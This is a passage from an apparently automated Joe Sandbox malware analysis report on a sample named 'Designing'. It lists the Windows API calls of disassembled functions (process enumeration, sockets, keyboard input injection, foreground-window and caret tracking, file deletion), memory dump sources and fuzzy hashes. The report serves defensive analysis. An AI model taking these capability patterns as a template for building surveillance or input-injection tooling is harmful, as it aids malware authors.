                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 314563124-0
                                                                                                                                                                              • Opcode ID: 4113a2a9b1c62f2c68725907bd0a2b806839986836338237d6f74247c36c25e4
                                                                                                                                                                              • Instruction ID: 4278b295b2a368151c7e8457009ef5e2fb63995392dba27e302c159b0eb19b6b
                                                                                                                                                                              • Opcode Fuzzy Hash: 4113a2a9b1c62f2c68725907bd0a2b806839986836338237d6f74247c36c25e4
                                                                                                                                                                              • Instruction Fuzzy Hash: C0810775A0010AEFCB04DF94C984EEEB7B9FF89315F204558E516BB290DB71AE46CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00E2B10C
                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00E2B11A
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00E2B1FC
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E2B20B
                                                                                                                                                                                • Part of subcall function 00DBE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DE4D73,?), ref: 00DBE395
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1991900642-0
                                                                                                                                                                              • Opcode ID: 3bffb25650652ac7b891bd5b58fd35f0a8d359d701a88da0273e6c7ec267f6db
                                                                                                                                                                              • Instruction ID: a5c136795f799044e06ff996fc0828ede77dcad4de1e6409f3bf2d600f98884e
                                                                                                                                                                              • Opcode Fuzzy Hash: 3bffb25650652ac7b891bd5b58fd35f0a8d359d701a88da0273e6c7ec267f6db
                                                                                                                                                                              • Instruction Fuzzy Hash: 79516BB1908310AFD710EF24DC86A5BBBE8FF89754F40491DF985A7291EB70D905CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                              • Opcode ID: 5bde1501c4a709a487ba2b345277da512025ed6a13f4960fec8bd61e6d5bfac5
                                                                                                                                                                              • Instruction ID: 6b4ba536b7b18795ff668bb742b6c3f90d12e251570808bb8c40eab7c5e630c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 5bde1501c4a709a487ba2b345277da512025ed6a13f4960fec8bd61e6d5bfac5
                                                                                                                                                                              • Instruction Fuzzy Hash: B2413D39740191BBDB217FBF9C85FBE3AA5EF45730F28022AF418D7291D63588414671
                                                                                                                                                                              APIs
                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00E2255A
                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00E22568
                                                                                                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E225E7
                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00E225F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$socket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1881357543-0
                                                                                                                                                                              • Opcode ID: 1b27091953df89860058c9aba469b65889bd1285d72307baeb66779630bdedcf
                                                                                                                                                                              • Instruction ID: 858eeebd76a14dc5ff97b93e451ef2a1c5baab22f36fdebc9668348bfb91d2c3
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b27091953df89860058c9aba469b65889bd1285d72307baeb66779630bdedcf
                                                                                                                                                                              • Instruction Fuzzy Hash: 1041D475A00210AFE720AF24D896F667BE5EB45718F54C44CFA1A9F2D2C772ED41CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E36D1A
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00E36D4D
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E36DBA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                                                              • Opcode ID: b5e50efe6c25a7acb137990b1e9ed81bc54af96cc04098cc173c2c6a74ec9e73
                                                                                                                                                                              • Instruction ID: 248cc39afcff300d14e495d23856786785bef261e114947378e05e1e5a04dd13
                                                                                                                                                                              • Opcode Fuzzy Hash: b5e50efe6c25a7acb137990b1e9ed81bc54af96cc04098cc173c2c6a74ec9e73
                                                                                                                                                                              • Instruction Fuzzy Hash: D7510A75A00209AFCF24DF65D8849AE7FB6FF84324F609159F915AB2A0D730EE85CB50
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 419a6e8367d9fe596b3e98e6fc3be7ddc3953678edb65f8d807b6e9c4d4a425a
                                                                                                                                                                              • Instruction ID: a453352844d61b341f67a34648ec1a9f590ee4cd31366ee8dc3b1c4bf3084ecb
                                                                                                                                                                              • Opcode Fuzzy Hash: 419a6e8367d9fe596b3e98e6fc3be7ddc3953678edb65f8d807b6e9c4d4a425a
                                                                                                                                                                              • Instruction Fuzzy Hash: 7241D172A40704EFD724AF78CC41BAABBADEB88724F11852BF151DB391D772990197B0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E161C8
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00E161EE
                                                                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E16213
                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E1623F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                                                              • Opcode ID: 53cabfddaa515a517ad3a6bbf3d060267fc7f1ace47a91ef459cee784d953342
                                                                                                                                                                              • Instruction ID: 65f04cce47f32ba83ef9b91ea5685c8b6a54245d14621e95ebbe5e0d905d4387
                                                                                                                                                                              • Opcode Fuzzy Hash: 53cabfddaa515a517ad3a6bbf3d060267fc7f1ace47a91ef459cee784d953342
                                                                                                                                                                              • Instruction Fuzzy Hash: 79412C75A00610DFCB11DF15C545A5ABBF2EF8A714B188888FC4AAB362CB31FD41DBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E0B473
                                                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 00E0B48F
                                                                                                                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E0B4FD
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E0B54F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: ec4e4d29bfdabce80566c24b735510749af316269b933326fbebfde3ec90397b
                                                                                                                                                                              • Instruction ID: 56201cbf3bc58125d4b4de326120a38ca90055aa4f1b5dbe972165ebb7164fc8
                                                                                                                                                                              • Opcode Fuzzy Hash: ec4e4d29bfdabce80566c24b735510749af316269b933326fbebfde3ec90397b
                                                                                                                                                                              • Instruction Fuzzy Hash: E4315970A4430CAEFF308B659C097FA7BB6BB54314F08525AE4A5B61D2E3748AC58761
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E0B5B8
                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E0B5D4
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E0B63B
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E0B68D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: dd5a1818f273d661f8cc36f0a0255998a76cd2750e478ce5507302531abb0a29
                                                                                                                                                                              • Instruction ID: 0a493167624d8bce5f6b1ccf65e88b443a3239aeadbef200b8da97ab22c39ae0
                                                                                                                                                                              • Opcode Fuzzy Hash: dd5a1818f273d661f8cc36f0a0255998a76cd2750e478ce5507302531abb0a29
                                                                                                                                                                              • Instruction Fuzzy Hash: C4310B3094060CAFFF308B659C097FA7BA6FF95314F08522AE481761D1C37689D58B55
                                                                                                                                                                              APIs
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00E380D4
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E3814A
                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00E3815A
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00E381C6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                              • Opcode ID: a1e5f4637008c0241259c564276b91c76adcd4f2e6b1efc4707cd2102e9119e8
                                                                                                                                                                              • Instruction ID: 9c88865ef94456413b872dfaa372087a13f58167d56529719b03f1576a42ff85
                                                                                                                                                                              • Opcode Fuzzy Hash: a1e5f4637008c0241259c564276b91c76adcd4f2e6b1efc4707cd2102e9119e8
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E418F30A02315DFCB15CF59C988AA97FF5FB85314F1451A8FA55BB261CB30A986CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00E32187
                                                                                                                                                                                • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
                                                                                                                                                                                • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
                                                                                                                                                                                • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 00E3219B
                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00E321E8
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00E321EE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                              • Opcode ID: 1090931b58cc25d744cfdbca1642062e04099681eca1fe5363aea08d07c2a272
                                                                                                                                                                              • Instruction ID: ee91b782099245243d8f2768c1bf0c582d30ce8a3ef1dbea4dfb7e4debcc0b90
                                                                                                                                                                              • Opcode Fuzzy Hash: 1090931b58cc25d744cfdbca1642062e04099681eca1fe5363aea08d07c2a272
                                                                                                                                                                              • Instruction Fuzzy Hash: 3D3192B1D00109AFC700DFA6CC85CAEBBFCEF48304B10446AE515E7251D7709E45CBA0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E8E2
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E8F9
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0E924
                                                                                                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E0E92F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3763101759-0
                                                                                                                                                                              • Opcode ID: fed74937b3d4bda380d3437d8e9bf9af3a97a1b03fb98b9b0eba71aaf42d0669
                                                                                                                                                                              • Instruction ID: d57a6a3123cca4142f06f1c7e47cff97327a8de19d78f05f94414fa0196c0c0e
                                                                                                                                                                              • Opcode Fuzzy Hash: fed74937b3d4bda380d3437d8e9bf9af3a97a1b03fb98b9b0eba71aaf42d0669
                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21A371900215EFCB14AFA4D982BAEB7B8EF95750F144069F804BB381D6709E41CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00E3DC30), ref: 00E0DBA6
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00E0DBB5
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E0DBC4
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E3DC30), ref: 00E0DC21
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2267087916-0
                                                                                                                                                                              • Opcode ID: afdee62dce6eb73cba25b8abf6fa4ef6ea5fa75356cb81b20b3059b54b943579
                                                                                                                                                                              • Instruction ID: d5866900a99b094f7bbc8cd83f4d6b483ce5662e869f3b838ce0471ce95f06f9
                                                                                                                                                                              • Opcode Fuzzy Hash: afdee62dce6eb73cba25b8abf6fa4ef6ea5fa75356cb81b20b3059b54b943579
                                                                                                                                                                              • Instruction Fuzzy Hash: A121803150C3059FD700DF68DC849ABBBE8EF56368F105A19F499A32E1D730D98ACB52
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00E332A6
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E332C0
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E332CE
                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E332DC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                                                              • Opcode ID: 3d4071bea38250656f2dd02b715392fd57f12964fb36fb255bfda213544362fa
                                                                                                                                                                              • Instruction ID: 21c3dd5131ed60b2e234a62b1ccf75f378494fb553fa507e6d3bc78d3f24b703
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d4071bea38250656f2dd02b715392fd57f12964fb36fb255bfda213544362fa
                                                                                                                                                                              • Instruction Fuzzy Hash: 3921C431208111AFD7149B24CC49FAB7FA5EF81324F248259F8269B2E2C771ED41CBD0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E096E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E08271,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?), ref: 00E096F3
                                                                                                                                                                                • Part of subcall function 00E096E4: lstrcpyW.KERNEL32(00000000,?,?,00E08271,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E09719
                                                                                                                                                                                • Part of subcall function 00E096E4: lstrcmpiW.KERNEL32(00000000,?,00E08271,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?), ref: 00E0974A
                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E0828A
                                                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E082B0
                                                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E090BB,00000000,?,0000001C,?,?,00000000), ref: 00E082EB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
